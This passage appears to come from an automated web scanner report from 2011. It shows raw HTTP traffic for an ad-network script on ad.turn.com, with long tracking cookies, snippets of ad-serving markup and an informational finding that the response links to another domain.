Cookie: uid=2931142961646634775; adImpCount=deBD6XxjsYiz5SlTL3QsHqCeCZZAhJZACNRa8rYWu9CY481wEkFtGX7HudJA1SwJxEdzmswgsukEeGYUFx4XIAH2_SOXrIDHPTc0gR2ZYb6X4Qp5J-iSAILnbVuT-E5I21TccxBCE2uOguftNs3B8ws3ywwa2wQp8g03EqWK3wXULH_zJEKV55m8F5IT4bStbNZCZ7Tuj_BJ7cZLEc5mK5sf4do6mfC-8t81xzfpAuHTE-6hqyhk_njhE1XVDqAvuPwNs9axYxesjGsAsjtmS7fwESJ4HNhmJtjvBex-YKB48eNzMDW20n17Occ4gTB__IK0nnhWM2b_q3ohsfZ0FEdiZK7lOdlFxq7hsewqebqQtSNfSWxIoar8U2brXnw1emNa-3CGw7dg2Xbxl9yyj7jdLOqAlYvMy4P_GXV-l2Nd0_CLzTvwT1_vWGRBlmkvMv1vOgw0X3-gN8kfaXCa2gpKpH42mzqWVKAieGonOpFqGjdQJTtjVZ9bXK_YQ_BTTZX5ZRX6gPsVI-wwHnP-7m1HPNJmxjyYHWoZ-RvqO1RCjqVnqlStqGRd7sOILi9yibQu-KItSuO9m-H6ccgm_x3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeO6XtB_8KKtgn7ZA9jOrjKEd8fmIByXYO4W9y75kdG0AQoWhO66D78aQTUGOa-5a4D7WEZ4W3MEhxLVI5mActJltBPdeqoht9ByqjYbOh33ur-s7TV8zO61799jJJQ7Db9rxZB7h3-RxsMa99bBPJd4GmpS1vpTy7CEw_F27aSBKqf2kh-PqYvIakotDSFG3J7fwESJ4HNhmJtjvBex-YKBKL2bBINxLZG77GEc74ezLum1TeQ0gLOufLDRpE5fx_doCOQisz4wYu1aRlLO_q9fFuXJfodYfBlfBGQdDWQIYemNa-3CGw7dg2Xbxl9yyj7_nb_paFFYJ3mkNwD4RMkIYjVge061K_CIJwjIVI3mKxylPN4c5ASigyqNvfErAzY7UcSE8Aook9MaDI3AzHm5qGjdQJTtjVZ9bXK_YQ_BTIA9qP5ZGicDObFIm227LY21HPNJmxjyYHWoZ-RvqO1SO6j1-eSdNp74pQOH_YTUz402GpSpZYrGQooIBIjmomSumXewWqlkGDMbbuT0pqPmli-F_XWotfUo8MrEbWr7hVdA-aRZXmNDP7lSI2wQSG1UIktgZIbPn0NUyIVFCCIhZgJrwaehFyqmD8BJNc02UdxByyd4I_jonpY8dinXj8Adt1kcsyM0PeiMQ7LTog2zrMfsNzkHkjjmmiKRiTpG_ZxVGypkJkxppNXBoj9hdYvxqzCp9mqb-fnf3vurqUKQ36EKXMAJD1f6mBFy-CLB31rG3DY3mwe9niReY-1Ub9QfbrEhJ1dvYLO3-yqcOOvXBgo6wiEWLgalkBJ3Yj08NQQ0XtSgyP9-pRtjKBA9Cw5kk-u3_879HeEzFKlOGPm1jw1q3jr96MmE73EdnErm3Am61Etmv-j5Jhttl5w_1NLVStSd8QzozyBSfQQx1fCKj37arSozuBgqeZjp8etrKqknRaP3V6oxECP0GOXabAIKqMVJJLJFDSB1wQojnNFK_L63JiB7oIrCw_byJGvNVBXmtxmz59YVbf0kdPFaj7nqjVEnayD5Ik9CHgcwVvzlMeKnT51KOU7tzVZSIEVXesDf_Pg2Vk_EWg-3dTD9pFT1DxfFmcifo1L4is0eoSxqZt2vLw1MQCNkN4b9W6YHjl7s6FAXEc8n5El2XcbrTueYqMsta8R3IevGWeQFGXBBV0D5pFleY0M_uVIjbBBIbslKzWLNSym58FovJA1cH9FITL70mX0cxZUNU6wgGFN9BSY6ik0FwtKNMqfv1k5CFmBfHR2QfBfW5szOuRY7narJgtkwbjBAoWil1i7PXIGQgBLG9yrBXxQ31WfiIrAk_B5xxjLy2u5fweq-AAPZ5sAIUZEyfLi_7gOz7FaE1JieQX-h53vB3lT-Gx03ffzIYQQ0XtSgyP9-pRtjKBA9CwzvLjrKqA2na3U7FHrRyysJjw1q3jr96MmE73EdnErm3Ya43PO_FBS1L8nFPfLNsoiQl1IbfBMxI7h-o4eVVmtGj37arSozuBgqeZjp8etrKR7t1lc6gxoU1PGs3RB5IFYKqMVJJLJFDSB1wQojnNFK-ydpF3OeXL-hvxClrpcTy8nBIQTGDQ0e81J548GDsezv90T-lAb-YFeOKm0KYk-jzOCOCLkdpLACc0kOaNihisDf_Pg2Vk_EWg-3dTD9pFd3Bx501MUvGDpJrg_dMjU0YXtmmbk-N1wOfquUn-OXo2ho9tr4zKfsJYr-S860V-_zfVdHmuabJokUCf89rOskZswsTNML5WtS_tFL4_HO-T3lqtRCIBQTAkUtF8Ze6x5-zCwLajI_fAi7yzInpUPcCtBtg3d9fRsI_s4Q4xuhxCO4UkD7DmRDCuTTKIqgfiiDMSJYYfKRa5oYJ-HF7HkrcgJAQ2nCtjZ9v7V-hw5WdNsjNgBK20dXMTQ5_E-tD43aK-dl03C8FcsmzUAvnpssfBrVo25TIsoi-UjNGpY4-CTTZ0LqOpDpMC4Ik6TqNC_VP1CVPOS9dQLLTrmNzscBrMaw8_PZJviQbsdfy3S10UYeZ7fVAuz1zjmMZ0gGgqLt2VjWlbLw3c1pgyIE5CShvuJBfhMMc3-2rXuK89xdwUG1xeHeMVc4q6BbKL36W03oeTQ7Lr-7EWe0QY9QI2B1l0eqesD8_A0QCk8hIfrJw6MNNscszzM1r-Wj1AH2-IofYdTYZ0YtkCZ7lQI-xUBV6kx3BKHN13VIhsPL-J7LlucGL4OVeuTCXzAPeveMCAT7rLlGdNjVTJlBXR5Ql_CV-e2PgEpaD3g5vJV7qkuAaG5Cvgl4yFR1SLt57-HYDswIvtbjbiK6PM_JhwfU7EXS7gMGPfPL5upKwYOp1wyHZYqfh7Jk_UqnNY8zMBdaawiSXfNfZkXaAxWmxFMLqWbSLsPkWvuS2cJVtRIZukDJCsxKU8-jozAhZyBK7r0iDK1xXg9YM80IWWEj9xS4caO9Cc6tCW1caCY5tvgQYuziiUJ-BlQ55NEjM4csCKauR9fMy_oUyyPFYNoTEgyHSw_kjEb4rLm3q5zsxVXs4oa4_T5HJ8POaPhCLXqvhJ4PHOaXPviAPJdZnXyR34eV66BHZSFpdi22R_hlJYFq3IvWpfCPO5tADmqIGCNFj6jsbOrS9MmfQK_Fi1PH23xdE5pl_pMk2OgJnYAbvpzWSxVtlvlyrKH42N2E6DjOdA07AsE5ItNy8ZSWW1QxlzR5Wk4lredlHZ5PB4vZS9PjysgJtUf7Icm9Hx-iCdWMBVi86BPT_qkzfsSKKeD8t82Vp0lh2z3EGVDVryO3sDqvHjCvljrmGqA7HlQFRbEgj3Apu56U9PvLT5Yl-7nSexy6OYYxYue7BCLJbDJi_av1GKkV-G48M-k3pWEsY0DSMKeXVjBCwtqNB_pQoyOMmpgj114hj1XX_gstQp5fQiHyRyXU5gJYCPMLcp-WjE9gA8bSugzTecOAf0cShrg4vL8HVPUiTQclLOdW1PrxE8drMecpZ; fc=uxxiXch1QKU85iYPGx-2w4-YPxezbeSP3RflKnmPzFDfnbopa38X7kcK0gidXbQx2g9tsxB_asXrCmB8yAZFhCEVuEBWF2BJd4O6JLUjzhsHGSI5ugrubbCeW8l4bd0K3B8CrRgeBwcufwGyEuNk9fwEc8UdWGFr9OnyQPdjde1XZQx7UVDjyg8AFQSGxDX399fWqLtNe7SQ8BirYxSk-4mBf3sYQ8SCqGOQToPn17o; pf=ECYJS9-oxql8N_uZXFb8CHwDE7_wM8CB1cwK-wdnj-uWHdXU58c6zYPI8ptz-kcxy3YNScPJBpPFFuHL0J---Fj9Fw_ghz_PVAPwGCUX-90-T3t6mL3yHizb4mwtgU5QQNk8yq0Qj72V6SyxgQxbLVJL8kq4-YDRBElsqmGBsv1JY3Xda-wZS8AHLAgUrAb8RARr4sEY7YNrQUJwCnGgOKCYwbnr2fUVVWky3vF6-lXmzrV_z0Y16mAJLIK7wxIJJ893jYsNF3UJjN7Q_g1qDK0_PipTd7EM21gJm5CQiuVYwgKi80iaKojRy9CSHHsThmpzkllKlZJ2Qy8JJq0K6kocqRzWaGRRbNLHTv61h1138Wgc784VvH-zNSzEj7GoNx16neM2KucGo2pbORyATp4z6TmQssiIT5OVU1ls_spuUzkxn8VlM2iGlOk2z4tE4KQQf9OREyizwHyC2sAdAoUKoSM2yvo48XmD0BI9PnvNImweGuBUil0xi-GN04zWlMZiZE9V-GV_y5gECNbsUl6zzjIXKON9Ynaz9n_pzpv8riJB2DO_Q0ZyrxISTm6JePqWyN4HBtUdcmaqEdLOS10KRhJdpOeo4Y8z336nR05UAwdLKUrYLuZ_J4UaUiSxWD-8jO93H0kg2wwsdjjJO52gY7B3BVcJwfOEGFr7W86rM_irW5Kpbu5iBYpA09CpR7G5mgMxLDQyBkrANU12WWSntU2RQp1wWIzpm9Mzs7ryFlJvRkWmLqxuLsRCPJDHVxmontykR1O5ZT7KsC0OyTCvCn1PPbvylVmfNaf6LEwyekw0-5mCFY0EEkEZ4sjQwyYG4CKBOwOYkgFO_pjvZTPKPZiOLB_V2S5_NmA0yleF6EnxPRAQHlTM_nRSVZNLUCZ06c3hrLHNiJJ7ty33vJCyNKWeeDzoqtS3YAmJ9qKQlYCzu_UgrT1Pp6hrlsCXuCmVYOfDKjQfMjxkBwBRFWCxARYwu7BAeh_4_-UoSd0qgvYOm6Cd9iuDupssJeiSV_KjX_45VtKhb8h2yQJgHA; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:14:09 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:14:09 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=jgTUAhD8yyc_Kg50e9hEZkpkM9Bv0-MQmYkuhjew8TbnC_qO6MHzQQWlPjZ1W_-txEdzmswgsukEeGYUFx4XIAH2_SOXrIDHPTc0gR2ZYb6X4Qp5J-iSAILnbVuT-E5I21TccxBCE2uOguftNs3B8ws3ywwa2wQp8g03EqWK3wXULH_zJEKV55m8F5IT4bStbNZCZ7Tuj_BJ7cZLEc5mK5sf4do6mfC-8t81xzfpAuHTE-6hqyhk_njhE1XVDqAvuPwNs9axYxesjGsAsjtmS7fwESJ4HNhmJtjvBex-YKB48eNzMDW20n17Occ4gTB__IK0nnhWM2b_q3ohsfZ0FEdiZK7lOdlFxq7hsewqebqQtSNfSWxIoar8U2brXnw1emNa-3CGw7dg2Xbxl9yyj7jdLOqAlYvMy4P_GXV-l2Nd0_CLzTvwT1_vWGRBlmkvMv1vOgw0X3-gN8kfaXCa2gpKpH42mzqWVKAieGonOpFqGjdQJTtjVZ9bXK_YQ_BTTZX5ZRX6gPsVI-wwHnP-7m1HPNJmxjyYHWoZ-RvqO1RCjqVnqlStqGRd7sOILi9yibQu-KItSuO9m-H6ccgm_x3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeO6XtB_8KKtgn7ZA9jOrjKEd8fmIByXYO4W9y75kdG0AQoWhO66D78aQTUGOa-5a4D7WEZ4W3MEhxLVI5mActJltBPdeqoht9ByqjYbOh33ur-s7TV8zO61799jJJQ7Db9rxZB7h3-RxsMa99bBPJd4GmpS1vpTy7CEw_F27aSBKqf2kh-PqYvIakotDSFG3J7fwESJ4HNhmJtjvBex-YKBKL2bBINxLZG77GEc74ezLum1TeQ0gLOufLDRpE5fx_doCOQisz4wYu1aRlLO_q9fFuXJfodYfBlfBGQdDWQIYemNa-3CGw7dg2Xbxl9yyj7_nb_paFFYJ3mkNwD4RMkIYjVge061K_CIJwjIVI3mKxylPN4c5ASigyqNvfErAzY7UcSE8Aook9MaDI3AzHm5qGjdQJTtjVZ9bXK_YQ_BTIA9qP5ZGicDObFIm227LY21HPNJmxjyYHWoZ-RvqO1SO6j1-eSdNp74pQOH_YTUz402GpSpZYrGQooIBIjmomQv23jz_PImutYCGy4NsGlqUrNfKUHuG9fqFSqxJLAAn9_4hD9vZ7YeA_WZHrHWVzWRJpnHJzxENPIxXQapeuxB2UmbQAQwXPRckrDV-AXOOp4RnopZye3I2VeDNhcjONOM3jMgTp8BKlZ2DWuEL5IiyYLZMG4wQKFopdYuz1yBkxD26x1gip5BpouTqQNF0JuPB5ZRi14nCO708GRewYFdB1dtNXdx2ZGrhYOji1A8MEK9MssrJ5pCmd-CgnpeX-4NxMb_jqjXdJlxPCzwfdNRyLt2up7jforFrJx0QC8iWQQ0XtSgyP9-pRtjKBA9Cw7-k7SecffEMDnhUTogy7NZjw1q3jr96MmE73EdnErm3bNaxp1MeDYmNSHvXvrzzVlyDYobbPl_1lGpaz-OqtaWj37arSozuBgqeZjp8etrKBevGxFWpekCJIJygsUSBX4KqMVJJLJFDSB1wQojnNFJoRdE870GyjYnjTu08vRhKtBRJueICEsYzfm3n4D_Sg-UwHwhiIhI6vYlDAmBKnXv0vdBXYrpjO1BZ2QqSRvYgsDf_Pg2Vk_EWg-3dTD9pFcCHJyDtRR7lKLZ6IDSGQONMtUWTuwXQdSlf1DYzl7Djl7s6FAXEc8n5El2XcbrTuXX0jd1b3TKa7Bvoi3RUcbdV0D5pFleY0M_uVIjbBBIbWXtRu1uwx2j-2tVC2U09EARzaM85XOnnIs3YsAXTRuAGMoAiCYLjlpCHoPaeF1Kd1S2mIQ-eP9kcQOolWCEX1bJgtkwbjBAoWil1i7PXIGSJRFMMAhz4c6QNFwOPpG7YOwiGbZycrdghgM4PLmqoFQUEoMWEPlTC2W-RtCxHslRAIKzY_7Ua025LEjxZcZcvQQ0XtSgyP9-pRtjKBA9CwxXhrSrNYRbnUlLBboVs3OZjw1q3jr96MmE73EdnErm3Uoh74dzRmGvqfbCNn6gXO2kdFyrgvwiqcEPj7s4cLSaj37arSozuBgqeZjp8etrK2EvLhKLxH1DACQdolO20I4KqMVJJLJFDSB1wQojnNFK2X7e8ihfvpI9yFc0YQDfx4QL5QFVaR6lRez9LgMFGwOUwHwhiIhI6vYlDAmBKnXuzJjFFEWR1R9ZD29ofCUzjCFbuZ4ziCOb7BPOlCZdvCMDk3ABmU7PcwYyvyIzz7Yi5Q43LSlHHbU3eBcz8bZqzRFY5WK8_96VqF6dKUq7oAC1c0WeAW1tji-0ZEap8SiuE6MwFijde_qwjRwST42qdI4NR7_yRxMXmZjlBrvOXhu8wTaZoi4WtPLy3Y3_RsAJcJsvz3VOH6vsZ7HFuAkZdaxD5IJh1UN5Nifl4kF-7pX00oKVOFhyN6O5s9cs3lbWBPDdteBYAUA6kOALzXwAwcTRYuks1gbvwNAW89QzBVT0sH85BBf8_oJnQakeV1EvzN1r8DMqBXcM4RVz1lkAJLAf7K1xF-F6USpfSQW8X8QhtMLO0SnbJa61hvRUhz34TqJfMexnD1u5Dp40sc1ozssJeDLr3yIqSebkPOo67lKr_gSIJbORjM4TD3kMMhBBQLCwkpMUgq8PymuXaEqn9p9Ppc6WQ1txsZDOVXOYUo2b7k8ZSbyYs_WqbPFiUyD1wi5Rq7FtCWKCVGQXeXdOReg8WzhWlPneNiNDUEiBi1P9B6wgylqzhQIvtwtBQJgR58XxmG4PAjq9NglQN-Hs3h6-JA-CJR2vjDLcc7kX6b-mVcubVBT_Lx4T2WZAJjDOe3iG8P7WOAvB8Jr75YVRr_H-KDpbvmNB-gqgm6UJRd7-LJRNjQqKHAxGzIe3A2Dpf6VNUtQy8xosscBnLqoHJV-yF-ZBcPeAKPWD0Z8vkZYh9Ivy55BiwnZpODBw2O3Ehjs6JEfjo_Lz_9k0iGFTfvHkEPTuCgWAlc9KiLWo7cZgLIcMYW3TMHujJXk-j8lTag10MDiziGNsbuj-OgFZLG-13Rsp1snx1srXP9ZUD466--dM0SGaLCcfbxvhl9jRzO7Clyd-46PPiaOJfHXQmdL2z2OzbjwpEX1CYbhPQBuK9f2AUx_uXOV7yDljECpfnHSAtn2YUHqb7xuWWWZwFh1CC9RrpOyzPdZJ_miZKXzjEK7dJVwwxjSFQ9UiIfeW55uQNRTg8LS5hxQpOJd7uGFH_EXjrgD4W6_TZN-Gwi2s4Zn984Q9IxHlO9OJS1OWQeqFgNAjlvsSXqBKu_ULaziAYWg0eLSJmMn0HXQupsRCEBi_WrsdFst_Aau-Ir8MFEOtHU5HRYo9dDCYlGvZJePExLpwrRS53bQsvHq3nuyfSHpIp0xsON8lSTdNMcZkjt2YHOogrBtNcdA3du0BbK25-bjgRCaSKuV3F26JbWCU2XOXc0GWykuyhbq4OzGOLd2rgIpZdxak7-Le7AhTsMb48f2XHSCPhRqFz5RkPgTPHhxpsYitV-nrGjC-QHHPX6hs-NlPU_pNFke2vJ0Jz; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:14:09 GMT; Path=/
Set-Cookie: fc=e84JCFNHSXUq2WFGWPaGaQlTaujSyGWglRISRUbYcwj-BgEYNbULQsQnJSvHtZR1h_6Fy59RsfMGx2OPDA92rV7k3wz-hA_nvJsQ77ws1V62qLaXiXtLgqbyIAPknaGJF2Y3nF2sogXvl_T-_cXpojtCumotBqc3MEsQYbjdrJoLcIqy0z9VGWKwxmaKKQ8XnLbzR0hp8geuo9g-ix58aWe7XKhMRutfkMpZuWUsim-qONPAcUfbmswfIykg5y75; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:14:09 GMT; Path=/
Set-Cookie: pf=0oWpOn0KI8_dL0JN-BTLz62VUqqNyIMx2MQFDOn4oDMIHKIn0aMUCJnjty0nF6sdy3YNScPJBpPFFuHL0J---G8DNuFwCC8mN4p0gv_2GvXB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:14:09 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:14:08 GMT
Content-Length: 10114


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442545&PluID=0&ord=&ord=3367103046410436708&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.45. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=739JIzvALy56eDDqJQS39FR8J9WhYwrxnROzWwCChnM9XoWQAkLU_2ggLq50jQG2LGgelz04ch13nml8chQ9uK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN5ei3VHa01VsmgGuwFyNi4D1jqGYNVEoTZiB8PgDyUCTlavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYV0Lx85IfstsDOG1d7FMwKtoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk85SgEEswKh1LTzH1WJY68rH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTYwAFqPUK7F3E0PZOG9h8rZtVuJUm3zJKqQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBXfM-Y1O0TfXRFsS7sQebnNmHDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyXQUZBWUf8zmRZwI-2CksJq62GXg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681462&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663462279&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663462290&frm=1&adk=2614322350&ga_vid=893085860.1303663462&ga_sid=1303663462&ga_hid=2122288689&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=HHrIK5hAlUnQBoCN0bSvefMc2aF_d4O6NbvYHyiG4jrAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7aaNTkI9kS54NknjDupuixK5USU-ZcOXIQo4iBgywgxw7fwESJ4HNhmJtjvBex-YKBtMoOjMfgnqSKBm8uRROyp_0wuBEv5K59-FgY_KS69_toCOQisz4wYu1aRlLO_q9dObNhCfGM-ksQnUh4TxpdHemNa-3CGw7dg2Xbxl9yyj6AYjXhTSIw6z6qbZ6xheAvhNKKp2uy6Jf_izbJ4fT1IEPHO3_r72yVU4GQkE5oTqqXa0db9PEB0kZFgOkbWCiJqGjdQJTtjVZ9bXK_YQ_BTgtVJj4_1ydNStOQnPPrnrG1HPNJmxjyYHWoZ-RvqO1RjP6j5yoDetv1dHSPkIYgPFTUpFr2Sd9cwp1pS459Skh3BGIBe1qfIDTYPebZTLrDOC-VCmCQbUZMtawqCLvvmKR1gXBTdH5jry0PtoQ1AeM37Bfigr7HDTxZoxZiwsWfX15VcAFldmraeNOcTMkrum9YpuWKbAR0rzdoecy5gZy3WXyJHyyuomO7DjHx9DERtBPdeqoht9ByqjYbOh33u-1d3YQe7N-3IAQesJf2UHCk5ZCkZva7scR7OAbaax21Ec8OVkmsGiB-c6iWVn9ld27GAKZi-oEp2bDk9Utrxk7fwESJ4HNhmJtjvBex-YKDJQD84niFp1gCpoN54_iTS7dQaUAsNKGmGOpY_21OIIyOjD7OO6-cARpkZSLPRSVlzaD4aw7phrXQ8Sa65QbHAemNa-3CGw7dg2Xbxl9yyjzPaDe3o_bL1Qxs5JcgZIBEwfqRHkdzRktg9x4ASm7mYEUY0gkSIQpBXzynTrJNwCSFM3wJ2ug19vueYnHYtN1xe2P_hhg7Zbh0pY2S6uagWAKvNWR9DVB7s857bYqH-vZR6D3V1MZpXDmdmkMw9H28y3_SMVKIz-IywSNv3WzvIF-t4yaRUKwYipw0CJzB0aIjgoipP0yyjzR5ioI9loz99U1RtOkWEInQ5e--zZMdSVdA-aRZXmNDP7lSI2wQSGyeUFM0FnJRRrPYsBbxvhPCuAxHKY_BYCKAf2FzvKM6_svKMY-WOYUH6QaQPs9bAqtnbooWp_NrkXSMzjtGaat6yYLZMG4wQKFopdYuz1yBk-BAyTBTFwNjYduwxOD4xUkQkq0n0yMG86X_ZGC4oqWnwItPsoAoxJQfw-oyEQxRyhTeXLgOjd5mCNMGZRMvzlM-SIYtOVAAH4DJGVnLyE0zHY91AS25fF1MGItnXKXtvQQ0XtSgyP9-pRtjKBA9CwziYiIFZaUlrv8g-zYvqHHpjw1q3jr96MmE73EdnErm3L1-gbIWhcHpgba-bkNmD98dgLeBf_Vl6MIVnKxMALSuj37arSozuBgqeZjp8etrKZBIl9s2WXnmelQBS41tEU4KqMVJJLJFDSB1wQojnNFImZOIrKkZ-0eszXplpY4YQXnDiLDBqyosL8KyUlDOLbOUwHwhiIhI6vYlDAmBKnXvMqSvs52IOLcaY_lbOwL7psDf_Pg2Vk_EWg-3dTD9pFYOZom_dEc7B4kQgu9vbZKtEwlYAq2bVnwph6eqpjpOTl7s6FAXEc8n5El2XcbrTuandLa9TdSokJHtMGGH7U6ZV0D5pFleY0M_uVIjbBBIbk23oiSXPjciHxzjuyXjG-zeqT6hUnbo2htLjMWqUwdTc0Z54gQS40DQvJIuqPCvcJKTepk1MIfmuO0KP08mYHrJgtkwbjBAoWil1i7PXIGT8_7Ynt0HUAVUg1LVCMkJvvdUa0NuxLM2XW_puxeWePs4L_JfIFlRNCH2BuG7vC_L4X8zVG3yrgYLQ9gmeibnuQQ0XtSgyP9-pRtjKBA9Cw16l2Bub3KJ7ymT3J4Bv7dCHggxjgs4w7v5Xlb-5Op5EeGOwOQvlXCQVM9zSiiNHAMwzbS6XH8PIk3LelOrpPmbnTIM_wFLXfcwd5V86XjQkFpy_Vf7zkSF-ItYRvthr17Fbccyc8U5wh4Ud4Hlpu2BSlKVf-0QjJg7odNI1SvXDFZUDCpeqjMAw9BbmEmo9VRTWoBesfzoEDV34GPtDUqWbddG37JENOgdwRu5oBEZT3zNzuVrhEcz_5yMF9anYcUaI5c5g72UFM30Fam4qiIW0kJe224E7ZHXxZky5qxCNQGrife3ozBKJDbsyQMPpr8VRTr8Nl9SK1_WCr4ljw61UakqYfbO7oQoFYd5M61iF1TMePRIs3Ql47Rec4vrEgkid5u8voWars0ao_qpATqNKxYofDxJVJxV2JyJkeGjx8ZZ9F1bENTTHi8N7GFJxIY4oQmqqzgtHazWsPWt1suyfQtl-zq1WlNAP-ra31MFT62KO2zMSbyoDUc4nlNLLQ280wA0cJ2fnl2nbKCRFIwabHeO1